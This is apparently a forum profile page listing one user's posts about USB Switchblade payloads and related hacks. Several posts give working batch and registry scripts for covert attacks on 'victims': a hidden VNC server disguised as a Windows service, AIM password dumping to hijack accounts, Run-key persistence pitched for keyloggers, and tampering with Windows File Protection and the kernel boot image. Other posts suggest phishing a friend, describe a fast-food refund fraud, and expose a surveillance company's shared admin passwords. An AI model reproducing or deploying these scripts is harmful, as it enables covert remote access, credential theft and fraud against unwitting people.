Jump to content

AndyzBong

Active Members
  • Posts

    26
  • Joined

  • Last visited

Everything posted by AndyzBong

  1. I've got a couple more pictures to take but I figure that I might as well post my lame.. umm.. mod? http://andyzbong.angelfire.com/index.html I would just post the image but angelfire (yeah.. I know) would replace it with the "this image is hosted by angelfire" bs. Love it or hate it; I will be making a "wITTy" mod as well. If you're thinking of "T"; then you've never been to an ITT campus. - AndyzBong
  2. I know that I am about 10 days late to reply to this post, but http://canyouseeme.org is also a good site to use; other-than http://portforward.com
  3. I agree with most that social engineering would be the best way to go about this. Perhaps a fake phishing email sent through an open mail relay server would be your best bet. You know him personally so you know the vulnerabilities in his character.
  4. Yes, just like in Space Rouge's article; you can use Google to view and move (PTZ) cameras. However, you will not be able to stop the recording or disable the surveillance system in anyway. Actually, most of these "Google hack" cameras are meant to be viewed over the internet without a login or password; as they are always in "guest mode". You could DDoS the address; but even then, you're not "hacking" (and all recorded video events will still be on the local machine) - AndyzBong
  5. I'm in. And since I have already written an article for Analog5; I'm on the score board. This weekend I will write up another article; but me and Famicoman can't write an entire e-zine ourselves. Writing an article for Analog5 would be a great way to earn points.
  6. Howdy all, I recently was employed as a "Surveillance System Software Support Specialist" for a private video surveillance company here in Pa. Now, we all know that if you aim an infrared laser-pointer at an IR surveillance camera at night, you will completely "white out" the camera; but today I wanted to discuss some of the other vulnerabilities in not only the surveillance cameras, but the PC that runs the surveillance software. First off, all of our PCs are running Windows XP and automatically login to windows under an administrator account without password verification. The reason I was given for this; is so when there is a power outage the computer will automatically reboot when the UPS is out of battery and the power is restored. Good, great, grand, and wonderful... but it doesn't have to be an administrative user. However, I just do what I'm told. Secondly, when Windows XP boots the surveillance software runs on startup, logged in under "guest mode". Guest allows you to do nothing (such as Stop Monitoring, exit full screen mode, exit the software, etc). My boss thinks that "When you're logged in as guest, you cannot close the software or make any changes." However, you can run task manager and kill the process. Our software's process is not run under system it is run under the administrative user. Lastly, I do not install the surveillance cameras or run their conduit, but I have learned a lot about how surveillance cameras can pick up interference. A couple of our customers are machine shops (machinist), who want to keep a watchful eye on their carbide supply. The exterior of the building is usually aluminum and the welders like to ground their equipment to the beams of the building. This gives the entire building a negative charge which will go through the metal housing of the cameras and cause interference on the cameras that looks like HBO porn before a descrambler. I asked a camera installer if I put a 9v battery up to the housing of the camera, would it cause the same interference? His response was "I wouldn't doubt it." And our wireless cameras? Worse. Now this is not the same for every video surveillance company, just the companies that cheat their customers and fill up the pockets of the boss. We don't even use shielding for any of the cameras unless there is a cell phone base tower right next door to our customer (or some other equivalent of massive interference). One final note, the administrative login to ALL of our customers is "admin" and the administrative password to ALL of our customers is eight characters all lowercase. If you could run a dictionary attack on our software's login page, not only would you be in on one computer, but if you had a copy of our clients' DNS addresses... you'd be admin on them all. PS: Since our surveillance systems are PC-based, our customers enjoy monitoring their cameras from home via the internet. If one were to stumble upon their DNS address and reached a login page; one would only have to login as "guest" with no password in-order to view the cameras. Just like Space Rogue's write-up about Google hacking surveillance systems. http://www.spacerogue.net/wordpress/?p=38 - AndyzBong
  7. Howdy all, I always enjoy a new silent VNC server install via the USB switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMDtvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd) My vnc.cmd code looks like this: @echo off REM Silent Install of TightVNC server REM Script by kz26 REM Copy VNC Server Files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM Install fake WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Port: 8080 REM Username: N/A REM Password: hacked net start winvnc :End exit This are my reg1.reg and reg2.reg code(s): reg1.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 "AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 and finally, this is my go.cmd code that launches vnc.cmd: @echo [START Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 start /b .vnc.cmd @echo [End Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 :End exit This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine. Note: I added [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon? - AndyzBong
  8. Hello all, Recently a friend of mine at ITT who works at McDonalds informed me of an interesting trick. This little "hack" allows you to get an additional Double-Quarter Pounder burger at McDonalds. You should really do this with two separate people on two separate orders. Step 1: Order a regular Quarter Pounder burger and a Double Quarter Pounder burger. (add other items if you wish to disguise the "hack") Step 2: Upon receiving your food, place your Quarter Pounder burger in the Double Quarter Pounder box and hide the double Quarter Pounder. Step 3: Tell cashier that there has been a mistake and you have received a regular Quarter Pounder instead of a double. (both the double and single sandwich come in the same "Quarter Pounder" box) Step 4: Receive another double Quarter Pounder in replacement of your single Quarter Pounder. You now have two double Quarter Pounder McDonald burgers. Enjoy, AndyzBong (information provided by Paul "Wall" P.)
  9. One of the more creative uses of the USB Switchblade is the Folding@Home capability. I once read an article about a software programmer who just happened to have SETI@Home installed on his wife's laptop that was stolen. Long story short, when the thieves logged into the internet with the stolen laptop and the screen-saver was activated, SETI went into effect. The laptop automatically logged itself into the SETI@Home account and displayed it's new IP. The ISP was contacted, records were seized, thieves got arrest, the laptop got returned. I do not know why you would go through all this trouble for (what should be) a 512mb flash-drive. If you are worried about a lost Switchblade and revenge is your primary concern; I would set the payload to e-mail you (a junk Yahoo account) the captured logs/passwords (as well as store them on the USB). It may not be stealthy, but I hope it helped. Heres the SETI article: http://www.virtuallystrange.net/ufo/update...b/m15-005.shtml
  10. Kimberly might not be too happy to find out that her full name and work email are so public. Very nice find secret52.
  11. I have heard of such "EXE Binders", being used to combine animated greeting-card software and trojan horse servers. Wikipedia "File Binder". As far as a *.jpeg file being binded with an *.exe ... I do have to admit; I have downloaded such a program. Anti-Virus caught it and I decided not to test it out. DLL Injections are cooler anyways. - AndyzBong
  12. Enlightened about the quotations, gotta read my Windows CL book more.... I knew the /y was supposed to go in there somewhere. Thanks GonZor; this is why I am a Hackling and you are a Zombie.
  13. So I've been messing around lately with a couple of home-brew payload additions for my USB Switchblade and I decided that I wanted one of my particular payloads to be dumped in my "victims" Startup folder (for execution upon the next reboot). Note: My payload addition is just a harmless prank for a friend of mine. All the program does is continually loop vbCritical MsgBoxs that say "Your system is critically running low on virtual memory!". Hence the program is named VirtuMem.exe It all seemed simple enough right? copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me) or I had to find another solution around this. Anywho, if you are familiar with SysInternal's freeware program called AutoRuns; then you know that applications such as AIM, QuickTime, Symantec, and other software-vendors can autorun their applications upon login without having a .LNK file in the Startup folder. My solution to the problem was merely to copy a version of VirtuMem into my WIPCMD folder and create a *.reg file (named startup.reg) like so: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "VirtuMem"="C:WINDOWSSYSTEM32VirtuMem.exe" and then add the following code to my go.cmd file: @echo [START AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 echo. >> Documentslogfiles%computername%.log 2>&1 copy H:WIPCMDVirtuMem.exe C:WINDOWSSYSTEM32 regedit.exe /s WIPCMDstartup.reg echo. >> Documentslogfiles%computername%.log 2>&1 @echo [END AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 I just figure it was a neat trick that I would share with the community. This would work well for keyloggers or any other applications that you may want to run at startup, without keeping the file in the Startup folder. This also could be used for non-malicious purposes... I can clearly see the teenage computer network lab technician who hates the WeatherBug's autorun on all the campus lab computers due to AOL Instant Messenger (and deleting the registry values instead of importing them). Final Note: I have not yet tried this on my "friend". I am not responsible for you screwing up your Windows Registry and not making backups of your vast pr0n collection or your Windows Registry. I will let you know how the results go, but so far; this code is untested. In conclusion, if you have a different way around Startup, or if my syntax is completely wrong, or if I am completely wrong, or if you've liked this minor piece of info; let me know. This code is for Windows XP Pro (as far as I know). Peace. - AndyzBong
  14. Try Googling "Hexing Your Malware" (without the quotations). This was a suggestion that I read off a post in the old forums. The first link from GovernmentSecurity.org is a forum post with horrible spelling mistakes. I deciphered the instructions, downloaded Hex Workshop, tested, failed, retested, failed, re-retested, failed. (You get the idea?) So I do not suggest that particular article, but there are about 297,000 results so have fun experimenting.... oh.. and deciphering. - AndyzBong
  15. Unless you have read my previous post (from a while back) concerning the extraction and exploitation (via the USB Switchblade) of AIM 5.9 encrypted passwords, I suggest reading it before continuing: http://forums.hak5.org/index.php/topic,4398.0.html This should give you a basic understanding of the concept. Anyways, for those of you who are familiar with my previous post, this is merely an update that you can add to your go.cmd file to extract AIM 6.0 encrypted passwords and exploit them to sign-on as "hacked screen-names". The technique of importing the AIM registry information properly (at your computer) takes a few attempts to get it down pat, so be patient. I suggest exiting out of any AIM clients, and repeatedly checking RegEdit to see if the encrypted password has still been entered. Finally, I must again stress that this exploit is more of a DoS attack or could possibly serve as a social engineering attack (by impersonating the "hacked" victim. Once you have the encrypted password, you cannot change it, you can only kick the screen-name off-line when the AOL System Manager informs you that "You are now signed-on in two locations. Press 1 to disconnect your other connection." The new code to add is as follows: regedit.exe /E Documentslogfilesaim6pass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6Passwords" regedit.exe /E Documentslogfilesaim6hashpass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6HashedPasswords" Your complete AIM 5.9 & AIM 6.0 go.cmd code should look like: @echo [AIM 5.9 &amp; 6.0 Encrypted Password Dump] &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo. &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 regedit.exe /E Documentslogfilesaim59dump.reg "HKEY_CURRENT_USERSOFTWAREAmerica OnlineAOL Instant Messenger (TM)CurrentVersionusers" TYPE Documentslogfilesaim59dump.reg | find "Password1" &gt;&gt; Documentslogfiles%computername%.log regedit.exe /E Documentslogfilesaim6pass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6Passwords" regedit.exe /E Documentslogfilesaim6hashpass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6HashedPasswords" echo. &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 @echo [END AIM 5.9 &amp; 6.0 Encrypted Password Dump] &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Like I previously stated, this a great alternative to MessenPass (due to some Anti-Viruses being able to detect MessenPass and it's inability to decrypt passwords for versions of AIM beyond 5.5). If you are having trouble, please leave a detail description of what the problem is, and I will try my best to help. Lastly, and the kind of interesting part. AIM 5.9 profile files are stored on the oscar.aim.com server (correct me if I am wrong) and are "roaming profiles" ; similar to "roaming buddy-lists" (you can sign on from any location and still have your profile and buddy-list). AIM 6.0 however, stores your profile information locally in a file called common.cls in the directory: C:Documents and Settings<username>local settingsapplication dataaol ocpaimstoragedata<screen-name>local storage Common.cls appears as a Visual Basic module, I could not open it with VB6, so use ole' trusty Notepad. When you sign on a "hacked" AIM 6.0 screen-name you can (remotely) change the victim's profile, save it, and it will change the data in the common.cls file (as well as be their new profile). (Search for <HTML> in common.cls to find the profile beginning). The great part is, if you have physical access to the machine (since you're using you're USB Switchblade and all) you can set common.cls to "Read-Only". Enjoy! - AndyzBong
  16. Hey all, I ran across an interesting open-source project for Linux called "The Law Enforcement and Forensic Examiner Intro to Linux" at ftp://ftp.hq.nasa.gov/pub/ig/ccd/linuxintro/. I was just wondering if anyone has used this particular set of "tools and hands on projects"? Thoughts? Etc.. Also, this is going to be a really dumb question. I was bored the other day and visiting MySpace.com servers and sub-directories and I found this page on (what I believe to be the web-server of their "image server"(?) Anyways, here is the link. I'm interested in your opinions as to what "heartbeat" is and correcting all of my misinformation. Is it just some random web-server junk? http://a409.ac-images.myspacecdn.com - AndyzBong
  17. So I finally got some time off from class and I noticed that no one has added anything to this discussion, so why not do some experimentation? All of the registry information/ideas that I mentioned above are useless, as the U3 will just not autorun while the XP system is running a password protected screensaver. My final suggestion would be importing a screensaver "grace period" registry file via go.cmd Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "ScreenSaverGracePeriod"="120" This way, if you are able to insert the switchblade before the screensaver kicks in; but are unable to access the mouse (which would deactivate the idle countdown) before the password-protected screensaver activates, you won't have to login. NOTE: You can enter any whole number between 0 and 2,147,483 (approximately 24 days). A value of zero indicates no password protection delay and there is no default entry.
  18. The setting that controls whether a login should be performed when a workstation is unlocked or when a password-enabled screen saver is used is located in the registry value "ForceUnlockLogon" HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogon If you modify the data from a 0 to a 1 it will no longer require a login. I am not sure if you can change this registry data while the password-protected screen saver is running (as my go.cmd did not launch during a password-protected screen saver) but thats a good first experiment. Also, screen savers are considered operating system files and are "protected" from being deleted or overwritten. They are located in the WindowsSystem32 and WindowsSystem32dllcache folders. Like disabling the login, I am not sure if you would be able to delete these files while the screen saver is actively running. You could also attempt the registry value that controls whether screen savers are actively enabled. This registry value is "ScreenSaveActive" and is located in HKEY_USERS.DEFAULTControl PanelDesktop 0 = disabled 1 = enabled Hope this gets someone off to a creative way around this.
  19. AndyzBong

    Keymail

    Howdy folks, I was wondering if anyone has implemented Keymail into their USB Switchblade package? If so, what have the results been (detection by anti-virus, performance, etc)? Thanks all.
  20. I was wondering how exactly I go about viewing possible unencrypted passwords in the pagefile.sys file. I know that I would need a Linux Live CD in order to extract the file, but would I need forensic software to view the plain-text passwords? Any links or info would be greatly appreciated.
  21. A while back I was reading root-ftw's post ownage and became interested in the idea of safely modifying the ntoskrnl boot image via the USB Switchblade. (mine is a simple "Got Owned?" image) You will need (these all go in WIPCMD): 1. a ResHacked copy of ntoskrnl (name it nt0skrnl) 2. a modified copy of BOOT.ini 3. a .bat file called nt0skrnl.bat Software you will need: 1. Adobe Photoshop, Paint Shop Pro, or similar. 2. ResHack (ResHack) 3. HexEdit (optional) First open up Adobe Photoshop or Paint Shop Pro to create your custom boot image. The image has to be a 640x480 bitmap with a 16-color palette. NOT 16-bit colors, but a 16-color palette (meaning the entire image is only made up of 16 colors). You cannot use MS Paint because it uses a 24-color palette by default. I suggest making your own boot image, rather than downloading an image from a website. If your 16-color palette is made up of custom RGB colors, you have to do some hexediting to ntoskrnl. More information about making a custom image can be found here. After you have created your image, you will need a copy of ntoskrnl to modify with ResHack. Paste a copy of ntoskrnl.exe into your WIPCMD folder and open it with ResHack. The Windows XP boot image resource is located in Bitmap : 1 : 1033. On the menu bar click Action : Replace Bitmap, select your custom image, and save your modified ntoskrnl as nt0skrnl. If you are still having trouble using ResHack and ntoskrnl, more information can be found here. Next, open notepad in WIPCMD and create a BOOT.ini file with the following code: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /fastdetect /kernel=nt0skrnl.exe This method of delivery will be a lot safer than simply renaming the ntoskrnl file and replacing it with the modified version. Finally you will need to create a batch file named nt0skrnl.bat with the following code: @echo off ATTRIB -r -s -h C:BOOT.ini RENAME C:BOOT.ini BOOT.bak COPY /y H:WIPCMDBOOT.ini C: COPY /y H:WIPCMDnt0skrnl.exe C:WINDOWSsystem32 exit Now simply call the nt0skrnl.bat file from go.cmd and on the next reboot, your custom image will be displayed. If the computer you are doing this to has multiple partitions, or has XP installed on a drive other than C: you will need to change the code... duh. I also realize that this is "lame" and "malicious", so deal.
  22. haxorflakes, You mind find some help in one of my previous posts concerning extracting the encrypted passwords for AIM 5.9 AIM 5.9 encrypted password extract All you would have to do is possibly modify the location of the registry values and/or the keyword "Password1" that go.cmd uses to find the encrypted AIM password value.
  23. In-order to modify explorer.exe you need a copy of ResHack (http://www.angusj.com/resourcehacker/). The "Start" button resource is located in String Table : 38 : 1033. Simply edit the copy of explorer.exe in your WIPCMD folder and save the changes. NOTE: If you are going to add the code I mentioned in the above post to your go.cmd payload, make sure that you add it as the last program to run. Since the code kills the explorer.exe process; it is NOT silent. I have decided to modify my own code and copy the essential files to the 'victim' Startup folder, so that the Start button modification takes place upon the next reboot, and the Switchblade can run silently. Changing the Start Button (http://www.overclockersclub.com/guides/xpstartbutton.php) Disabling Windows File Protection (http://www.microsoft.com/whdc/archive/wfp.mspx#ENAAC) PsKill (http://www.microsoft.com/technet/sysintern...ads/PsKill.mspx) Detailing Windows Explorer with ResHack (http://wint.virtualplastic.net/showtweak.php?tweak_id=56) Detailing Windows Explorer with ResHack #2 (http://wint.virtualplastic.net/showtweak.php?tweak_id=75)
  24. I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button. NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue. MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER! You will need 4 things (these all go in WIPCMD): 1. A registry file to import a key that disables Windows File Protection 2. A modified version of explorer.exe 3. A batch file to delay time when copying the modified explorer 4. A copy of Pskill First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "SFCDisable"=dword:000001 [HKEY_CURRENT_USERSoftwareSysinternalsPsKill] "EulaAccepted"=dword:00000001 Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify it's start button to whatever you want. Save the changes to explorer.exe Then create a batch file named blank.bat and a batch file named explorer.bat Blank.bat will be blank (duh), and explorer.bat will have the following code: @echo off regedit.exe /s WIPCMDwfpskill.reg pskill.exe explorer.exe RENAME C:WINDOWSsystem32dllcacheexplorer.exe explorer.bak COPY /y F:WIPCMDexplorer.exe C:WINDOWSsystem32dllcache TYPE NUL | F:WIPCMDblank.bat /N /CY /TY,5 &gt;NUL COPY /y F:WIPCMDexplorer.exe C:WINDOWS C:WINDOWSexplorer.exe exit Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go. This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries. Mad props to KarmikTrance.
×
×
  • Create New...